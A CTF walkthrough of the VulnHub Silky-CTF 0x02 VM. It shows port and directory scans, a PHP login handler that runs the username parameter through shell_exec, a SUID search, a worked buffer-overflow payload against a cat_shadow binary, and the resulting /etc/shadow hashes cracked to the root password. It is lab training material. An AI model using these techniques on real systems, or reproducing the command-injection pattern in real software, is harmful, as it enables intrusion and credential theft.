You can download the VM here: https://www.vulnhub.com/entry/silky-ctf-0x02,307/

Use nmap to do a thorough port scan of all 65535 TCP ports:

root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.161
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 11:50 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating ARP Ping Scan at 11:50
Scanning 192.168.227.161 [1 port]
Completed ARP Ping Scan at 11:50, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:50
Completed Parallel DNS resolution of 1 host. at 11:50, 0.15s elapsed
Initiating SYN Stealth Scan at 11:50
Scanning 192.168.227.161 [65535 ports]
Discovered open port 80/tcp on 192.168.227.161
Discovered open port 22/tcp on 192.168.227.161
Completed SYN Stealth Scan at 11:50, 2.28s elapsed (65535 total ports)
Initiating Service scan at 11:50
Scanning 2 services on 192.168.227.161
Completed Service scan at 11:50, 6.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.161
NSE: Script scanning 192.168.227.161.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.24s elapsed
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Nmap scan report for 192.168.227.161
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 eb:74:50:5c:6f:57:04:15:bd:8c:57:ff:eb:a2:9f:58 (RSA)
| 256 97:50:40:64:05:4e:57:44:7d:31:a7:60:84:0a:9d:5c (ECDSA)
|_ 256 fe:6e:fa:67:54:96:a7:bd:54:45:10:30:1c:20:c3:61 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:FB:F0:E8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.226 days (since Sun Jun 9 06:25:50 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.227.161

NSE: Script Post-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Check the HTTP service (port 80) with dirb:

root@kali:~# dirb http://192.168.227.161

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Jun 9 11:52:15 2019
URL_BASE: http://192.168.227.161/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.161/ ----
+ http://192.168.227.161/admin.php (CODE:200|SIZE:3702)
+ http://192.168.227.161/index.html (CODE:200|SIZE:10701)
+ http://192.168.227.161/server-status (CODE:403|SIZE:303)

-----------------
END_TIME: Sun Jun 9 11:52:18 2019
DOWNLOADED: 4612 - FOUND: 3


I tried SQL injection and brute forcing against admin.php; both failed.

I was stuck here for a very long time with no clues.

I googled a walkthrough and found that there is command execution in the ‘username’ parameter…

How ridiculous. How is it even possible that the username gets executed on a login page?

<?php
// Login handler from the challenge VM, reproduced as found: the raw
// "username" query parameter is handed to the shell before any check.
if (isset($_GET["username"])) {
    echo shell_exec($_GET["username"]);
    // Note the &&: the error is printed only when BOTH fields are wrong.
    if ($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
        echo "Falscher Nutzernamen oder falsches Passwort";
}
?>

How is this code even possible in a real-life scenario? Well, it is just a game, so…

Anyway, get a reverse shell through it.

Look for SUID files:

find / -user root -perm -4000 -print 2>/dev/null

/bin/mount
/bin/su
/bin/fusermount
/bin/umount
/bin/ping
/bin/ntfs-3g
/home/silky/cat_shadow
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device

/home/silky/cat_shadow seems quite interesting; take a look.


It seems to be a buffer overflow challenge. Generate a cyclic pattern here: https://wiremask.eu/tools/buffer-overflow-pattern-generator/

www-data@Silky-CTF0x02:/home/silky$ ./cat_shadow Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Trying to cat /etc/shadow
Permisson denied!
0x63413163 != 0x496c5962

0x63413163 is the ASCII bytes "cA1c", so search the pattern for "c1Ac" (cA1c reversed, since x86 is little-endian).


So the characters in front of "c1Ac" fill up the buffer, and the four bytes that overflow past it are what gets compared to 0x496c5962 (ASCII "IlYb", so "bYlI" in memory order).

So the final payload would be:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AbYlI
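The offset calculation above, as an added worked example (not from the original post or the challenge): it regenerates the same Aa0Aa1… pattern, locates the little-endian dword the binary reported, and builds the payload; the `overflowed_dword` function is only an assumed model of the binary (a 64-byte buffer followed by the compared dword), inferred from the page's output.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits

# Page values: dword the binary printed for the pattern, and the expected one.
LEAKED_DWORD = 0x63413163    # "cA1c" as big-endian ASCII, "c1Ac" in memory
TARGET_DWORD = 0x496c5962    # "IlYb" as big-endian ASCII, "bYlI" in memory


def cyclic_pattern(length: int) -> str:
    """Metasploit-style pattern (Aa0Aa1...Aa9Ab0...), digit cycling fastest."""
    chunks = (u + l + d for u in ascii_uppercase for l in ascii_lowercase for d in digits)
    return "".join(chunks)[:length]


def pattern_offset(pattern: str, dword: int) -> int:
    """Offset in the pattern of the 4 bytes that ended up in a little-endian dword.

    Returns -1 if the value did not come from the pattern (e.g. a stale stack value).
    """
    needle = struct.pack("<I", dword).decode("ascii")
    return pattern.find(needle)


def build_payload(offset: int, dword: int) -> bytes:
    """Filler up to the overflow point, then the wanted dword in memory byte order."""
    return cyclic_pattern(offset).encode() + struct.pack("<I", dword)


def overflowed_dword(arg: bytes, buf_size: int = 64) -> int:
    """ASSUMED model of cat_shadow: a buf_size-byte buffer with the compared
    dword right after it, so argv bytes [buf_size:buf_size+4] overwrite it."""
    spill = arg[buf_size:buf_size + 4].ljust(4, b"\x00")
    return struct.unpack("<I", spill)[0]


if __name__ == "__main__":
    probe = cyclic_pattern(200)                    # what the page fed the binary
    off = pattern_offset(probe, LEAKED_DWORD)      # -> 64
    print("offset:", off)
    print("payload:", build_payload(off, TARGET_DWORD).decode())
    print("model agrees:", overflowed_dword(probe.encode()) == LEAKED_DWORD)
```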
www-data@Silky-CTF0x02:/home/silky$ ./cat_shadow Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0AbYlI

Trying to read /etc/shadow
Succes
Printing...
root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::
daemon:*:18012:0:99999:7:::
bin:*:18012:0:99999:7:::
sys:*:18012:0:99999:7:::
sync:*:18012:0:99999:7:::
games:*:18012:0:99999:7:::
man:*:18012:0:99999:7:::
lp:*:18012:0:99999:7:::
mail:*:18012:0:99999:7:::
news:*:18012:0:99999:7:::
uucp:*:18012:0:99999:7:::
proxy:*:18012:0:99999:7:::
www-data:*:18012:0:99999:7:::
backup:*:18012:0:99999:7:::
list:*:18012:0:99999:7:::
irc:*:18012:0:99999:7:::
gnats:*:18012:0:99999:7:::
nobody:*:18012:0:99999:7:::
systemd-timesync:*:18012:0:99999:7:::
systemd-network:*:18012:0:99999:7:::
systemd-resolve:*:18012:0:99999:7:::
systemd-bus-proxy:*:18012:0:99999:7:::
_apt:*:18012:0:99999:7:::
dnsmasq:*:18012:0:99999:7:::
avahi-autoipd:*:18012:0:99999:7:::
messagebus:*:18012:0:99999:7:::
usbmux:*:18012:0:99999:7:::
geoclue:*:18012:0:99999:7:::
speech-dispatcher:!:18012:0:99999:7:::
rtkit:*:18012:0:99999:7:::
pulse:*:18012:0:99999:7:::
avahi:*:18012:0:99999:7:::
colord:*:18012:0:99999:7:::
saned:*:18012:0:99999:7:::
Debian-gdm:*:18012:0:99999:7:::
hplip:*:18012:0:99999:7:::
silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::
mysql:!:18012:0:99999:7:::
sshd:*:18012:0:99999:7:::

OK, now I have the hashes for silky and root. It’s john time: crack the hashes against a top-100000 password list and get the answer:


Log in with root:greygrey and get the root shell.
